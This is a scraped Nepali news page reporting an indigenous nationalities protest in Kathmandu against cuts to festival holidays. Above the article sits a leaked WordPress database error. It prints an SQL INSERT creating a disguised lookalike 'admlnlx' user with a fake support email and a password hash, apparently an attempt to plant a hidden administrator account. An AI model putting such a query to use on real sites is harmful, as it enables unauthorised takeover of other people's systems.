WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bm9UK3m62M8SACixFX/PsCpFLNsBDF1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 21:17:26', '', 'admlnlx', 'admlnlx')

बिदा कटौतीको बिरोधमा आदिवासी जनजातिको प्रदर्शन – Gaule Khabar

बिदा कटौतीको बिरोधमा आदिवासी जनजातिको प्रदर्शन

बिदा कटौतीको बिरोधमा आदिवासी जनजातिको प्रदर्शन

काठमाडौं, ४ पुस । आफ्नो चाडपर्वमा राष्ट्रिय विदा दिन माग गर्दै आदिवासी जनजाति समुदायले बुधबार माइतीघरमा प्रदर्शन गरेका छन् ।

नेपाल आदिवासी जनजाति महासंघको आह्वानमा विभिन्न आदिवासी जनजाति समुदायले प्रदर्शन गरेका हुन् । तमु ल्होसार, ग्याल्बो ल्होसार, सोनाम ल्होसार, उधौली, उभौली, माघी, माघे संक्रान्तिलगायतमा सार्वजानिक बिदा दिन माग गर्दै उनीहरुले प्रदर्शन गरेका थिए ।

आदिवासी जनजाति महासंघले आफ्नो समुदायको मुख्य चाडपर्वमा विदा नदिएको भन्दै आन्दोलन घोषणा गरेको थियो । सरकारले सार्वजनिक विदा कटौती गर्ने क्रममा यी समुदायका चाडहरूमा बिदा हटाएको थियो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका